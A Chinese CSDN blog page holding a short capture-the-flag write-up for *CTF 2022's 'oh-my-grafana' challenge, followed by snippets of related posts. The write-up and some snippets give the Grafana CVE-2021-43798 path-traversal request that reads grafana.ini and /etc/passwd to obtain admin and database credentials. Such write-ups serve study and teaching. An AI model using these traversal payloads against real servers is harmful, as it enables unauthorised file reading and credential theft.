【*CTF】 oh-my-grafana

最新推荐文章于 2024-08-02 15:46:02 发布
最新推荐文章于 2024-08-02 15:46:02 发布
阅读量1.8k 收藏 2
点赞数 2
分类专栏: 比赛wp 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aoao331198/article/details/124230237
版权
本文详细介绍了Grafana的CVE-2021-43798漏洞,通过/public/plugins/alertlist路径读取配置文件,获取admin默认密码,进一步利用配置信息登录数据库,并在explore中揭示flag。此过程展示了安全漏洞的利用步骤。
摘要由CSDN通过智能技术生成


Grafana任意文件读取漏洞(CVE-2021-43798)
有空另一个blog里复现一波,这里直接写wp

/public/plugins/alertlist/…/…/…/…/…/…/…/…/…/…/…/etc/grafana/grafana.ini 查看配置文件

在这里在这里插入图片描述插入图片描述
在配置文件里面可以找到admin的默认密码
在这里插入图片描述

成功登录进去后,尝试根据配置文件中的数据库信息登录数据库
在这里插入图片描述
在这里插入图片描述

然后在explore中可以得到flag
在这里插入图片描述

aoao今晚吃什么
关注
专栏目录
Grafana 任意文件读取Zero day漏洞-CVE-2021-43798分析
战神/calmness的博客
12-21 349
Grafana 任意文件读取Zero day漏洞-CVE-2021-43798分析 目录 Grafana 任意文件读取Zero day漏洞-CVE-2021-43798分析 漏洞描述 下载Grafana版本8.3.0进行复现测试 通过百度了解下历史漏洞进行测试; 复现安装 实践中的应用-如图所示: 修复建议: 参考链接: 漏洞描述 它是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,grafana可以在网络浏览器里显示数据图表和警告。2021年...
ctf-all-in-one
01-30
ctf-all-in-one
*CTF2022 oh-my-grafana
Sk1y的博客
04-19 3706
*CTF2022 oh-my-grafana 文章目录*CTF2022 oh-my-grafanaCVE-2021-43798读文件mysql读取信息 CVE-2021-43798 版本号为8.2.6,存在任意文件读取漏洞,CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞复现 可以打通,用这个poc GET /public/plugins/welcome/../../../../../../../../../etc/passwd HTTP/1.1 Host: 124.71.184.1
vluhub Grafana 任意文件读取漏洞分析(CVE-2021-43798 )
最新发布
yh
08-02 794
CVE-2021-43798
*ctf2022-web-oh-my-grafana
qq_43200143的博客
04-19 3608
*ctf2022-web-oh-my-grafana 学到的东西 1.fuzz ,自动化fuzz可能存在的文件,这个需要自己积累,以及提前准备好!包括工具和字典. 2.漏洞库的准备,开始时可以进行快速搜索 对于一些针对开源的软件或者有安装包的,可以自己搭建本地环境,来查看可能存在的漏洞 题目一上来是一个grafana的登陆页面,这个之前有接触过,这个应用存在漏洞. 点击forget password后可以看到,下面给到了版本 在进行一番信息收集后,通过searchsploit和搜索引擎搜索,发现存在一个
【漏洞复现】Grafana任意文件读取漏洞(CVE-2021-43798)
qq_45244158的博客
12-09 1万+
Grafana 任意文件读取漏洞复现(CVE-2021-43798)
CVE-2021-43798 Grafana 文件读取漏洞
2301_79724395的博客
04-16 1185
影响版本 Grafana 8.0.0-beta1 to 8.3.0攻击者可以通过将包含特殊目录遍历字符序列(…/)的特制HTTP请求发送到受影响的设备来利用此漏洞。成功利用该漏洞的攻击者可以在目标设备上查看文件系统上的的任意文件
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛中,可利用该工具自动识别编码类型并解码,快速解决misc类别的密码题目。 其他说明: 该工具具备智能判断密码...
CTF指南-常规的CTF题目解析.pptx
10-12
CTF指南-常规的CTF题目解析
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTFTools-v1.3.7 所有古典密码与现代密码解码与编码与一身
06-14
CTF-Tools是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码 本工具是所有MISC集于一身的解密加密工具 古典密码: 1.Affine(仿射加密) 2.Bacon(培根加密) 3.Brainfuck 4.Caesar(凯撒加密)...
Grafana(CVE-2021-43798)、Apache Druid 代码执行漏洞
qq_55202378的博客
05-14 328
Apache Druid是一个开源的分布式数据存储,它包括执行嵌入在各种类型请求中的用户提供的JavaScript代码的能力。Grafana是一个系统监测工具。
Grafana 未经授权任意访问漏洞(CVE-2022-32275)
murphysec的博客
06-08 9834
CVE-2022-32275漏洞是由于Grafana存在未授权访问漏洞,攻击者可以通过特定url,访问任意用户系统界面及读取任意文件。该漏洞影响范围一般。该问题已在新版本中修复,建议用户更新到最新版本。参考链接:https://nvd.nist.gov/vuln/detail/CVE-2022-32275 MISC:https://github.com/BrotherOfJhonny/grafana/blob/main/README.md       【使用墨菲安全的开源工具帮您快速检测代码安全】 墨菲安全
Grafana任意文件读取漏洞(CVE-2021-43798)
qq_50854662的博客
06-27 1145
Grafana任意文件读取漏洞
Grafana 8.x 插件模块目录穿越漏洞复现(CVE-2021-43798)
sweelg的博客
02-28 4638
目录 漏洞环境 漏洞复现 漏洞环境 执行如下命令启动一个Grafana 8.2.6版本服务器: docker-compose up -d 访问主页 漏洞复现 burp抓包测试 读取配置文件 /public/plugins/alertlist/../../../../../../../../../../../etc/passwd 读取数据库文件 /public/plugins/alertlist/../../../../../../.....
Grafana 未授权任意文件读取漏洞(CVE-2021-43798)
m0_58596609的博客
12-27 2377
Grafana 未授权任意文件读取漏洞(CVE-2021-43798)
awk sub gsub
热门推荐
11-18 2万+
awk sub gsub awk -F: '{sub(/root/, "ROOT"); print}' password ROOT:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/va...
Grafana 提醒注意严重的认证绕过漏洞
smellycat000的专栏
06-25 1081
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Grafana 为其多个应用版本发布安全修复方案,修复了一个严重漏洞,它可使攻击者绕过认证并接管使用 Azure Active Directory 用于认证的任何 Grafana 账户。该漏洞的编号是CVE-2023-3128,CVSS v3.1评分是9.4。Grafana 是一款广泛使用的开源分析和交互可视化 app,通过大量监控平台和应用程序...
ctfhub-git泄露stash
09-13
根据引用和引用提供的信息,你可以尝试使用GitHack和dirsearch工具来扫描和利用ctfhub-git的泄露。首先,进入GitHack文件夹,执行命令"python GitHack.py ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值